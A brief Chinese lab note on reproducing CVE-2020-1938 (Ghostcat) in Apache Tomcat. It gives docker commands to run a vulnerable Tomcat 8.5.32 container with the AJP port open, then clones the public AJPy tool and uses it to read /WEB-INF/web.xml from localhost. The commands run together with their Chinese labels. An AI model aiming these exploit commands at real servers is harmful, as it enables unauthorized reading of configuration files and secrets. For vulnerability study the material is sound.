CNVD-2020-10487 CVE-2020-1938
启动docker
systemctl start docker查找容器
docker search tomcat-8.5.32下载容器
docker pull duonghuuphuc/tomcat-8.5.32启动容器
docker run -d -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32查看容器
docker ps访问
http://127.0.0.1:8080/poc下载地址
https://github.com/hypn0s/AJPy git clone https://github.com/hypn0s/AJPy.git cd AJPy python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1 python tomcat.py version 127.0.0.1https://github.com/hypn0s/AJPy https://www.liuyixiang.com/post/109123.html
